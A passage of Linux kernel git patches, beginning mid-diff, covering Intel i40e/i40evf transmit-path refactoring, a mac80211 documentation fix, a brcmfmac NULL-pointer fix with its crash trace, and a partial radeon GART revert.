i40evf_maybe_stop_tx - 1st level check for tx stop conditions + * @tx_ring: the ring to be checked + * @size: the size buffer we want to assure is available + * + * Returns 0 if stop is not needed + **/ +#ifdef I40E_FCOE +int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +#else +static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +#endif +{ + if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) + return 0; + return __i40evf_maybe_stop_tx(tx_ring, size); +} + /** * i40e_tx_map - Build the Tx descriptor * @tx_ring: ring to send buffer on @@ -1806,8 +1847,12 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->next_to_use = i; + i40evf_maybe_stop_tx(tx_ring, DESC_NEEDED); /* notify HW of packet */ - writel(i, tx_ring->tail); + if (!skb->xmit_more || + netif_xmit_stopped(netdev_get_tx_queue(tx_ring->netdev, + tx_ring->queue_index))) + writel(i, tx_ring->tail); return; @@ -1828,43 +1873,6 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->next_to_use = i; } -/** - * __i40e_maybe_stop_tx - 2nd level check for tx stop conditions - * @tx_ring: the ring to be checked - * @size: the size buffer we want to assure is available - * - * Returns -EBUSY if a stop is needed, else 0 - **/ -static inline int __i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -{ - netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); - /* Memory barrier before checking head and tail */ - smp_mb(); - - /* Check again in a case another CPU has just made room available. */ - if (likely(I40E_DESC_UNUSED(tx_ring) < size)) - return -EBUSY; - - /* A reprieve! - use start_queue because it doesn't call schedule */ - netif_start_subqueue(tx_ring->netdev, tx_ring->queue_index); - ++tx_ring->tx_stats.restart_queue; - return 0; -} - -/** - * i40e_maybe_stop_tx - 1st level check for tx stop conditions - * @tx_ring: the ring to be checked - * @size: the size buffer we want to assure is available - * - * Returns 0 if stop is not needed - **/ -static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -{ - if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) - return 0; - return __i40e_maybe_stop_tx(tx_ring, size); -} - /** * i40e_xmit_descriptor_count - calculate number of tx descriptors needed * @skb: send buffer @@ -1890,7 +1898,7 @@ static int i40e_xmit_descriptor_count(struct sk_buff *skb, count += TXD_USE_COUNT(skb_shinfo(skb)->frags[f].size); count += TXD_USE_COUNT(skb_headlen(skb)); - if (i40e_maybe_stop_tx(tx_ring, count + 4 + 1)) { + if (i40evf_maybe_stop_tx(tx_ring, count + 4 + 1)) { tx_ring->tx_stats.tx_busy++; return 0; } @@ -1966,8 +1974,6 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, i40e_tx_map(tx_ring, skb, first, tx_flags, hdr_len, td_cmd, td_offset); - i40e_maybe_stop_tx(tx_ring, DESC_NEEDED); - return NETDEV_TX_OK; out_drop: From 3e587cf3c1cc2996c39f8a19e453cb8233112416 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:10 -0400 Subject: [PATCH 405/872] i40e/i40evf: force inline transmit functions Inlining these functions gives us about 15% more 64 byte packets per second when using pktgen. 13.3 million to 15 million with a single queue. Also fix the function names in i40evf to i40evf not i40e while we are touching the function header. Change-ID: I3294ae9b085cf438672b6db5f9af122490ead9d0 Signed-off-by: Jesse Brandeburg Signed-off-by: Catherine Sullivan Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 32 ++++++++--------- drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 36 +++++++++---------- 2 files changed, 32 insertions(+), 36 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 3414e468bb51..5fa43f7f1ebb 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -2063,13 +2063,13 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, * otherwise returns 0 to indicate the flags has been set properly. **/ #ifdef I40E_FCOE -int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, - struct i40e_ring *tx_ring, - u32 *flags) -#else -static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, +inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, struct i40e_ring *tx_ring, u32 *flags) +#else +static inline int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, + struct i40e_ring *tx_ring, + u32 *flags) #endif { __be16 protocol = skb->protocol; @@ -2412,9 +2412,9 @@ static inline int __i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * Returns 0 if stop is not needed **/ #ifdef I40E_FCOE -int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +inline int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) #else -static int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) +static inline int i40e_maybe_stop_tx(struct i40e_ring *tx_ring, int size) #endif { if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) @@ -2494,13 +2494,13 @@ static bool i40e_chk_linearize(struct sk_buff *skb, u32 tx_flags, * @td_offset: offset for checksum or crc **/ #ifdef I40E_FCOE -void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, - struct i40e_tx_buffer *first, u32 tx_flags, - const u8 hdr_len, u32 td_cmd, u32 td_offset) -#else -static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, +inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, struct i40e_tx_buffer *first, u32 tx_flags, const u8 hdr_len, u32 td_cmd, u32 td_offset) +#else +static inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, + struct i40e_tx_buffer *first, u32 tx_flags, + const u8 hdr_len, u32 td_cmd, u32 td_offset) #endif { unsigned int data_len = skb->data_len; @@ -2661,11 +2661,11 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, * one descriptor. **/ #ifdef I40E_FCOE -int i40e_xmit_descriptor_count(struct sk_buff *skb, - struct i40e_ring *tx_ring) -#else -static int i40e_xmit_descriptor_count(struct sk_buff *skb, +inline int i40e_xmit_descriptor_count(struct sk_buff *skb, struct i40e_ring *tx_ring) +#else +static inline int i40e_xmit_descriptor_count(struct sk_buff *skb, + struct i40e_ring *tx_ring) #endif { unsigned int f; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 64506631022d..0ac134b340ce 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -1347,7 +1347,7 @@ int i40evf_napi_poll(struct napi_struct *napi, int budget) } /** - * i40e_tx_prepare_vlan_flags - prepare generic TX VLAN tagging flags for HW + * i40evf_tx_prepare_vlan_flags - prepare generic TX VLAN tagging flags for HW * @skb: send buffer * @tx_ring: ring to send buffer on * @flags: the tx flags to be set @@ -1358,9 +1358,9 @@ int i40evf_napi_poll(struct napi_struct *napi, int budget) * Returns error code indicate the frame should be dropped upon error and the * otherwise returns 0 to indicate the flags has been set properly. **/ -static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, - struct i40e_ring *tx_ring, - u32 *flags) +static inline int i40evf_tx_prepare_vlan_flags(struct sk_buff *skb, + struct i40e_ring *tx_ring, + u32 *flags) { __be16 protocol = skb->protocol; u32 tx_flags = 0; @@ -1699,11 +1699,7 @@ static inline int __i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * * Returns 0 if stop is not needed **/ -#ifdef I40E_FCOE -int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -#else -static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) -#endif +static inline int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) { if (likely(I40E_DESC_UNUSED(tx_ring) >= size)) return 0; @@ -1711,7 +1707,7 @@ static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) } /** - * i40e_tx_map - Build the Tx descriptor + * i40evf_tx_map - Build the Tx descriptor * @tx_ring: ring to send buffer on * @skb: send buffer * @first: first buffer info buffer to use @@ -1720,9 +1716,9 @@ static int i40evf_maybe_stop_tx(struct i40e_ring *tx_ring, int size) * @td_cmd: the command field in the descriptor * @td_offset: offset for checksum or crc **/ -static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, - struct i40e_tx_buffer *first, u32 tx_flags, - const u8 hdr_len, u32 td_cmd, u32 td_offset) +static inline void i40evf_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, + struct i40e_tx_buffer *first, u32 tx_flags, + const u8 hdr_len, u32 td_cmd, u32 td_offset) { unsigned int data_len = skb->data_len; unsigned int size = skb_headlen(skb); @@ -1874,7 +1870,7 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, } /** - * i40e_xmit_descriptor_count - calculate number of tx descriptors needed + * i40evf_xmit_descriptor_count - calculate number of tx descriptors needed * @skb: send buffer * @tx_ring: ring to send buffer on * @@ -1882,8 +1878,8 @@ static void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, * there is not enough descriptors available in this ring since we need at least * one descriptor. **/ -static int i40e_xmit_descriptor_count(struct sk_buff *skb, - struct i40e_ring *tx_ring) +static inline int i40evf_xmit_descriptor_count(struct sk_buff *skb, + struct i40e_ring *tx_ring) { unsigned int f; int count = 0; @@ -1924,11 +1920,11 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, u32 td_cmd = 0; u8 hdr_len = 0; int tso; - if (0 == i40e_xmit_descriptor_count(skb, tx_ring)) + if (0 == i40evf_xmit_descriptor_count(skb, tx_ring)) return NETDEV_TX_BUSY; /* prepare the xmit flags */ - if (i40e_tx_prepare_vlan_flags(skb, tx_ring, &tx_flags)) + if (i40evf_tx_prepare_vlan_flags(skb, tx_ring, &tx_flags)) goto out_drop; /* obtain protocol of skb */ @@ -1971,8 +1967,8 @@ static netdev_tx_t i40e_xmit_frame_ring(struct sk_buff *skb, i40e_create_tx_ctx(tx_ring, cd_type_cmd_tso_mss, cd_tunneling, cd_l2tag2); - i40e_tx_map(tx_ring, skb, first, tx_flags, hdr_len, - td_cmd, td_offset); + i40evf_tx_map(tx_ring, skb, first, tx_flags, hdr_len, + td_cmd, td_offset); return NETDEV_TX_OK; From 335075989fbb3c3fffc3ba238b893fa92508a6f1 Mon Sep 17 00:00:00 2001 From: Jesse Brandeburg Date: Thu, 16 Apr 2015 20:06:11 -0400 Subject: [PATCH 406/872] i40e/i40evf: remove time_stamp member The driver doesn't use the time_stamp member to determine if there is a tx_hang any more. There really isn't any point to the variable at all so just remove it. It was left over from a previous tx_hang design. Change-ID: I4c814827e1bcb46e45118fe37acdcfa814fb62a0 Signed-off-by: Jesse Brandeburg Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 10 ---------- drivers/net/ethernet/intel/i40e/i40e_txrx.h | 1 - drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 7 ------- drivers/net/ethernet/intel/i40evf/i40e_txrx.h | 1 - 4 files changed, 19 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 5fa43f7f1ebb..cc82a7ffacb0 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -165,9 +165,6 @@ int i40e_program_fdir_filter(struct i40e_fdir_filter *fdir_data, u8 *raw_packet, tx_desc->cmd_type_offset_bsz = build_ctob(td_cmd, 0, I40E_FDIR_MAX_RAW_PACKET_SIZE, 0); - /* set the timestamp */ - tx_buf->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. */ @@ -810,10 +807,6 @@ static bool i40e_clean_tx_irq(struct i40e_ring *tx_ring, int budget) tx_ring->vsi->seid, tx_ring->queue_index, tx_ring->next_to_use, i); - dev_info(tx_ring->dev, "tx_bi[next_to_clean]\n" - " time_stamp <%lx>\n" - " jiffies <%lx>\n", - tx_ring->tx_bi[i].time_stamp, jiffies); netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); @@ -2606,9 +2599,6 @@ static inline void i40e_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->queue_index), first->bytecount); - /* set the timestamp */ - first->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. (Only * applicable for weak-ordered memory model archs, diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.h b/drivers/net/ethernet/intel/i40e/i40e_txrx.h index ea1df3b48747..0dc48dc9ca61 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.h @@ -147,7 +147,6 @@ enum i40e_dyn_idx_t { struct i40e_tx_buffer { struct i40e_tx_desc *next_to_watch; - unsigned long time_stamp; union { struct sk_buff *skb; void *raw_buf; diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c index 0ac134b340ce..ec7e220757db 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.c @@ -322,10 +322,6 @@ static bool i40e_clean_tx_irq(struct i40e_ring *tx_ring, int budget) tx_ring->vsi->seid, tx_ring->queue_index, tx_ring->next_to_use, i); - dev_info(tx_ring->dev, "tx_bi[next_to_clean]\n" - " time_stamp <%lx>\n" - " jiffies <%lx>\n", - tx_ring->tx_bi[i].time_stamp, jiffies); netif_stop_subqueue(tx_ring->netdev, tx_ring->queue_index); @@ -1824,9 +1820,6 @@ static inline void i40evf_tx_map(struct i40e_ring *tx_ring, struct sk_buff *skb, tx_ring->queue_index), first->bytecount); - /* set the timestamp */ - first->time_stamp = jiffies; - /* Force memory writes to complete before letting h/w * know there are new descriptors to fetch. (Only * applicable for weak-ordered memory model archs, diff --git a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h index a23f5e862f06..e7a34f899f2c 100644 --- a/drivers/net/ethernet/intel/i40evf/i40e_txrx.h +++ b/drivers/net/ethernet/intel/i40evf/i40e_txrx.h @@ -146,7 +146,6 @@ enum i40e_dyn_idx_t { struct i40e_tx_buffer { struct i40e_tx_desc *next_to_watch; - unsigned long time_stamp; union { struct sk_buff *skb; void *raw_buf; From f029094e49814b56fdb3261a694c8890983b7a2d Mon Sep 17 00:00:00 2001 From: Catherine Sullivan Date: Thu, 16 Apr 2015 20:06:12 -0400 Subject: [PATCH 407/872] i40e: Bump version to 1.3.4 Bump. Change-ID: I54ec2787a9fead5e18447078f26e5dd27f01da44 Signed-off-by: Catherine Sullivan Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index d6113e3d76f2..0a3e928a2b00 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -39,7 +39,7 @@ static const char i40e_driver_string[] = #define DRV_VERSION_MAJOR 1 #define DRV_VERSION_MINOR 3 -#define DRV_VERSION_BUILD 2 +#define DRV_VERSION_BUILD 4 #define DRV_VERSION __stringify(DRV_VERSION_MAJOR) "." \ __stringify(DRV_VERSION_MINOR) "." \ __stringify(DRV_VERSION_BUILD) DRV_KERN From 3a7af58faa7829faa26026c245d2a8a44e9605c5 Mon Sep 17 00:00:00 2001 From: Jonathan Corbet Date: Mon, 13 Apr 2015 18:27:35 +0200 Subject: [PATCH 408/872] mac80211: Fix mac80211.h docbook comments A couple of enums in mac80211.h became structures recently, but the comments didn't follow suit, leading to errors like: Error(.//include/net/mac80211.h:367): Cannot parse enum! Documentation/DocBook/Makefile:93: recipe for target 'Documentation/DocBook/80211.xml' failed make[1]: *** [Documentation/DocBook/80211.xml] Error 1 Makefile:1361: recipe for target 'mandocs' failed make: *** [mandocs] Error 2 Fix the comments comments accordingly. Added a couple of other small comment fixes while I was there to silence other recently-added docbook warnings. Reported-by: Jim Davis Signed-off-by: Jonathan Corbet Signed-off-by: Johannes Berg --- include/net/mac80211.h | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/include/net/mac80211.h b/include/net/mac80211.h index 8e3668b44c29..fc57f6b82fc5 100644 --- a/include/net/mac80211.h +++ b/include/net/mac80211.h @@ -354,7 +354,7 @@ enum ieee80211_rssi_event_data { }; /** - * enum ieee80211_rssi_event - data attached to an %RSSI_EVENT + * struct ieee80211_rssi_event - data attached to an %RSSI_EVENT * @data: See &enum ieee80211_rssi_event_data */ struct ieee80211_rssi_event { @@ -388,7 +388,7 @@ enum ieee80211_mlme_event_status { }; /** - * enum ieee80211_mlme_event - data attached to an %MLME_EVENT + * struct ieee80211_mlme_event - data attached to an %MLME_EVENT * @data: See &enum ieee80211_mlme_event_data * @status: See &enum ieee80211_mlme_event_status * @reason: the reason code if applicable @@ -401,9 +401,10 @@ struct ieee80211_mlme_event { /** * struct ieee80211_event - event to be sent to the driver - * @type The event itself. See &enum ieee80211_event_type. + * @type: The event itself. See &enum ieee80211_event_type. * @rssi: relevant if &type is %RSSI_EVENT * @mlme: relevant if &type is %AUTH_EVENT + * @u: union holding the above two fields */ struct ieee80211_event { enum ieee80211_event_type type; From 7d072b404c5d8f1e0b62b6bc488dfeaa61bd2d8d Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Tue, 26 May 2015 13:19:46 +0200 Subject: [PATCH 409/872] brcmfmac: avoid null pointer access when brcmf_msgbuf_get_pktid() fails The function brcmf_msgbuf_get_pktid() may return a NULL pointer so the callers should check the return pointer before accessing it to avoid the crash below (see [1]): brcmfmac: brcmf_msgbuf_get_pktid: Invalid packet id 273 (not in use) BUG: unable to handle kernel NULL pointer dereference at 0000000000000080 IP: [] skb_pull+0x5/0x50 PGD 0 Oops: 0000 [#1] PREEMPT SMP Modules linked in: pci_stub vboxpci(O) vboxnetflt(O) vboxnetadp(O) vboxdrv(O) snd_hda_codec_hdmi bnep mousedev hid_generic ushwmon msr ext4 crc16 mbcache jbd2 sd_mod uas usb_storage ahci libahci libata scsi_mod xhci_pci xhci_hcd usbcore usb_common CPU: 0 PID: 1661 Comm: irq/61-brcmf_pc Tainted: G O 4.0.1-MacbookPro-ARCH #1 Hardware name: Apple Inc. MacBookPro12,1/Mac-E43C1C25D4880AD6, BIOS MBP121.88Z.0167.B02.1503241251 03/24/2015 task: ffff880264203cc0 ti: ffff88025ffe4000 task.ti: ffff88025ffe4000 RIP: 0010:[] [] skb_pull+0x5/0x50 RSP: 0018:ffff88025ffe7d40 EFLAGS: 00010202 RAX: 0000000000000000 RBX: ffff88008a33c000 RCX: 0000000000000044 RDX: 0000000000000000 RSI: 000000000000004a RDI: 0000000000000000 RBP: ffff88025ffe7da8 R08: 0000000000000096 R09: 000000000000004a R10: 0000000000000000 R11: 000000000000048e R12: ffff88025ff14f00 R13: 0000000000000000 R14: ffff880263b48200 R15: ffff88008a33c000 FS: 0000000000000000(0000) GS:ffff88026ec00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000080 CR3: 000000000180b000 CR4: 00000000003407f0 Stack: ffffffffa06aed74 ffff88025ffe7dc8 ffff880263b48270 ffff880263b48278 05ea88020000004a 0002ffff81014635 000000001720b2f6 ffff88026ec116c0 ffff880263b48200 0000000000010000 ffff880263b4ae00 ffff880264203cc0 Call Trace: [] ? brcmf_msgbuf_process_rx+0x404/0x480 [brcmfmac] [] ? irq_finalize_oneshot.part.30+0xf0/0xf0 [] brcmf_proto_msgbuf_rx_trigger+0x35/0xf0 [brcmfmac] [] brcmf_pcie_isr_thread_v2+0x8a/0x130 [brcmfmac] [] irq_thread_fn+0x20/0x50 [] irq_thread+0x13f/0x170 [] ? wake_threads_waitq+0x30/0x30 [] ? irq_thread_dtor+0xb0/0xb0 [] kthread+0xd8/0xf0 [] ? kthread_create_on_node+0x1c0/0x1c0 [] ret_from_fork+0x58/0x90 [] ? kthread_create_on_node+0x1c0/0x1c0 Code: 01 83 e2 f7 88 50 01 48 83 c4 08 5b 5d f3 c3 0f 1f 80 00 00 00 00 83 e2 f7 88 50 01 c3 66 0f 1f 84 00 00 00 00 00 0f 1f RIP [] skb_pull+0x5/0x50 RSP CR2: 0000000000000080 ---[ end trace b074c0f90e7c997d ]--- [1] http://mid.gmane.org/20150430193259.GA5630@googlemail.com Cc: # v3.18, v3.19, v4.0, v4.1 Reported-by: Michael Hornung Reviewed-by: Hante Meuleman Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c index 4ec9811f49c8..65efb1468988 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/msgbuf.c @@ -511,11 +511,9 @@ static int brcmf_msgbuf_query_dcmd(struct brcmf_pub *drvr, int ifidx, msgbuf->rx_pktids, msgbuf->ioctl_resp_pktid); if (msgbuf->ioctl_resp_ret_len != 0) { - if (!skb) { - brcmf_err("Invalid packet id idx recv'd %d\n", - msgbuf->ioctl_resp_pktid); + if (!skb) return -EBADF; - } + memcpy(buf, skb->data, (len < msgbuf->ioctl_resp_ret_len) ? len : msgbuf->ioctl_resp_ret_len); } @@ -874,10 +872,8 @@ brcmf_msgbuf_process_txstatus(struct brcmf_msgbuf *msgbuf, void *buf) flowid -= BRCMF_NROF_H2D_COMMON_MSGRINGS; skb = brcmf_msgbuf_get_pktid(msgbuf->drvr->bus_if->dev, msgbuf->tx_pktids, idx); - if (!skb) { - brcmf_err("Invalid packet id idx recv'd %d\n", idx); + if (!skb) return; - } set_bit(flowid, msgbuf->txstatus_done_map); commonring = msgbuf->flowrings[flowid]; @@ -1156,6 +1152,8 @@ brcmf_msgbuf_process_rx_complete(struct brcmf_msgbuf *msgbuf, void *buf) skb = brcmf_msgbuf_get_pktid(msgbuf->drvr->bus_if->dev, msgbuf->rx_pktids, idx); + if (!skb) + return; if (data_offset) skb_pull(skb, data_offset); From 7c0411d2fabc2e2702c9871ffb603e251158b317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Christian=20K=C3=B6nig?= Date: Thu, 28 May 2015 15:51:59 +0200 Subject: [PATCH 410/872] drm/radeon: partially revert "fix VM_CONTEXT*_PAGE_TABLE_END_ADDR handling" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit We have that bug for years and some users report side effects when fixing it on older hardware. So revert it for VM_CONTEXT0_PAGE_TABLE_END_ADDR, but keep it for VM 1-15. Signed-off-by: Christian König CC: stable@vger.kernel.org Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/cik.c | 2 +- drivers/gpu/drm/radeon/evergreen.c | 2 +- drivers/gpu/drm/radeon/ni.c | 2 +- drivers/gpu/drm/radeon/r600.c | 2 +- drivers/gpu/drm/radeon/rv770.c | 2 +- drivers/gpu/drm/radeon/si.c | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/gpu/drm/radeon/cik.c b/drivers/gpu/drm/radeon/cik.c index a0c35bbc8546..ba50f3c1c2e0 100644 --- a/drivers/gpu/drm/radeon/cik.c +++ b/drivers/gpu/drm/radeon/cik.c @@ -5822,7 +5822,7 @@ static int cik_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(4)); /* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); diff --git a/drivers/gpu/drm/radeon/evergreen.c b/drivers/gpu/drm/radeon/evergreen.c index 05e6d6ef5963..f848acfd3fc8 100644 --- a/drivers/gpu/drm/radeon/evergreen.c +++ b/drivers/gpu/drm/radeon/evergreen.c @@ -2485,7 +2485,7 @@ static int evergreen_pcie_gart_enable(struct radeon_device *rdev) WREG32(MC_VM_MB_L1_TLB2_CNTL, tmp); WREG32(MC_VM_MB_L1_TLB3_CNTL, tmp); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/ni.c b/drivers/gpu/drm/radeon/ni.c index aba2f428c0a8..64d3a771920d 100644 --- a/drivers/gpu/drm/radeon/ni.c +++ b/drivers/gpu/drm/radeon/ni.c @@ -1282,7 +1282,7 @@ static int cayman_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(6)); /* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_PROTECTION_FAULT_DEFAULT_ADDR, (u32)(rdev->dummy_page.addr >> 12)); diff --git a/drivers/gpu/drm/radeon/r600.c b/drivers/gpu/drm/radeon/r600.c index 25b4ac967742..8f6d862a1882 100644 --- a/drivers/gpu/drm/radeon/r600.c +++ b/drivers/gpu/drm/radeon/r600.c @@ -1112,7 +1112,7 @@ static int r600_pcie_gart_enable(struct radeon_device *rdev) WREG32(MC_VM_L1_TLB_MCB_RD_SEM_CNTL, tmp | ENABLE_SEMAPHORE_MODE); WREG32(MC_VM_L1_TLB_MCB_WR_SEM_CNTL, tmp | ENABLE_SEMAPHORE_MODE); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/rv770.c b/drivers/gpu/drm/radeon/rv770.c index c54d6313a46d..01ee96acb398 100644 --- a/drivers/gpu/drm/radeon/rv770.c +++ b/drivers/gpu/drm/radeon/rv770.c @@ -921,7 +921,7 @@ static int rv770_pcie_gart_enable(struct radeon_device *rdev) WREG32(MC_VM_MB_L1_TLB2_CNTL, tmp); WREG32(MC_VM_MB_L1_TLB3_CNTL, tmp); WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); WREG32(VM_CONTEXT0_CNTL, ENABLE_CONTEXT | PAGE_TABLE_DEPTH(0) | RANGE_PROTECTION_FAULT_ENABLE_DEFAULT); diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c index 5326f753e107..4c679b802bc8 100644 --- a/drivers/gpu/drm/radeon/si.c +++ b/drivers/gpu/drm/radeon/si.c @@ -4303,7 +4303,7 @@ static int si_pcie_gart_enable(struct radeon_device *rdev) L2_CACHE_BIGK_FRAGMENT_SIZE(4)); /* setup context0 */ WREG32(VM_CONTEXT0_PAGE_TABLE_START_ADDR, rdev->mc.gtt_start >> 12); - WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, (rdev->mc.gtt_end >> 12) - 1); + WREG32(VM_CONTEXT0_PAGE_TABLE_END_ADDR, rdev->mc.gtt_end >> 12); WREG32(VM_CONTEXT0_PAGE_TABLE_BASE_ADDR, rdev->gart.table_addr >> 12); 